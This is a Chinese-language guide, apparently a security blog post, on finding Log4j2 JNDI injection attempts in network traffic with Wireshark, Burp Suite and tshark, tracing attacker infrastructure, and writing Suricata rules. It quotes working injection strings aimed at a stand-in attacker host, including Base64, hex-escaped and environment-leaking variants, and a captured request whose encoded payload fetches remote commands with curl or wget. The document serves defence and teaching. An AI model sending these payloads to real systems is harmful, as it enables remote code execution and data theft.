实战流量分析:从Wireshark到Burp Suite捕捉Log4j2攻击痕迹
当安全监控系统突然告警,屏幕上跳动着"疑似Log4j2漏洞利用"的红色提示,作为安全工程师的你该如何快速锁定攻击源头?本文将带你深入网络流量分析的实战前线,用Wireshark和Burp Suite这两把"手术刀",解剖Log4j2攻击的完整证据链。
1. 攻击流量特征速查手册
在开始抓包前,我们需要建立攻击特征的"通缉令"。不同于基础教程中简单的${jndi:ldap}示例,实战中遇到的攻击往往经过精心伪装:
常见注入点:
- HTTP头部的
User-Agent、Referer、X-Forwarded-For等字段 - URL参数中的搜索关键词、表单字段
- Cookie值和POST请求体中的JSON/XML数据
- HTTP头部的
变种Payload识别表:
类型 示例 Base64编码 JHtqbmRpOmxkYXA6Ly9hdHRhY2tlci5jb20vRXhwbG9pdH0=十六进制转义 \x24\x7b\x6a\x6e\x64\x69\x3a\x6c\x64\x61\x70\x3a\x2f\x2f...嵌套环境变量 ${jndi:ldap://${env:USER}.attacker.com}DNS日志泄露 ${jndi:dns://${hostName}.attacker.com/log}
注意:攻击者常会混用大小写(如
${Jndi:RmI...})来绕过简单正则检测
2. Wireshark狩猎实战
打开Wireshark时,面对汹涌的数据包洪流,这几个过滤技巧能帮你快速定位可疑流量:
# 捕获所有包含"jndi"关键字的HTTP流量(不区分大小写) http contains "jndi" or tcp contains "jndi" # 检测LDAP/RMI外连行为(常见于漏洞利用第二阶段) tcp.port == 389 or tcp.port == 636 or tcp.port == 1099 # 查找DNS查询中的可疑域名 dns.qry.name contains "${" or dns.qry.name contains "jndi"分析案例:某次应急响应中,我们发现异常流量隐藏在普通的API请求中:
GET /api/v1/user/profile HTTP/1.1 Host: victim.com X-API-Version: ${jndi:ldap://45.xx.xx.xx:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUueHgueHgueHg6OTk5L2NtZCB8fCB3Z2V0IC1xIC1PLSA0NS54eC54eC54eDo5OTk5L2NtZCk=}通过Wireshark的"Follow TCP Stream"功能,可以完整还原攻击链:
- 初始注入点位于
X-API-Version头 - 受害服务器向
45.xx.xx.xx:1389发起LDAP连接 - 攻击者返回恶意Java类加载指令
- 服务器执行Base64解码后的反弹Shell命令
3. Burp Suite历史记录挖掘
当你有机会拿到应用服务器的Burp Suite流量记录时,这些技巧能提高分析效率:
搜索策略:
# 在Proxy -> HTTP history中使用以下搜索条件: "^\$\{jndi:" # 标准JNDI模式 "\$\{[^}]+:.*://" # 捕获各种协议变种 "(?i)\$\{(jndi|env|lower|upper)" # 不区分大小写的关键函数重点检查位置:
- 所有带参数的GET/POST请求
- 非标准HTTP头(尤其是自定义头)
- JSON/XML中的字符串值
- 文件上传时的文件名和元数据
实战技巧:使用Burp的"Match and Replace"功能自动高亮可疑请求:
- 进入
Proxy -> Options -> Match and Replace - 添加规则:匹配
\$\{.+\},替换为[!!!]${...[!!!] - 所有包含动态表达式的请求会被立即标记
4. 攻击者基础设施溯源
捕获到攻击Payload只是开始,真正的价值在于追踪攻击者基础设施:
提取C2地址:
- 从LDAP/RMI/DNS Payload中解析IP和域名
- 使用
tcpdump提取DNS查询记录:tcpdump -n -i eth0 'udp port 53' | grep -E 'jndi|ldap|rmi'
威胁情报关联:
- 将IP提交到VirusTotal、AlienVault等平台
- 检查域名Whois信息和历史解析记录
攻击时间线重建:
# 使用tshark提取关键事件时间戳 tshark -r attack.pcap -Y "http contains 'jndi'" -T fields -e frame.time
在最近处理的案例中,我们通过关联多个Payload中的LDAP地址,发现攻击者使用同一台服务器针对不同系统发起攻击,最终定位到是个有组织的加密货币挖矿团伙。
5. 防御者锦囊:不只是打补丁
除了尽快升级Log4j2版本,这些实战经验值得加入你的防御体系:
网络层检测规则(Suricata/Snort示例):
alert http any any -> any any ( msg:"Possible Log4j2 JNDI Injection"; flow:to_server; content:"${"; distance:0; content:"jndi:"; within:10; content:"://"; within:30; metadata:service http; sid:1000001; )应用层防护建议:
- 在WAF中添加针对
${的模式检测 - 对出站流量实施LDAP/RMI端口管控
- 建立DNS查询日志监控,关注非常规域名解析
- 在WAF中添加针对
取证检查清单:
- 查找服务器上异常的Java进程
- 检查
/tmp、/dev/shm等目录的陌生文件 - 审计crontab和systemd中的新增任务
- 扫描近期新增的ssh密钥和用户账号
在一次金融行业的应急响应中,我们通过结合网络流量分析和主机取证,发现攻击者虽然利用Log4j2漏洞入侵,但实际目标是横向移动窃取数据库凭证。这种案例提醒我们,漏洞利用只是攻击链的起点。
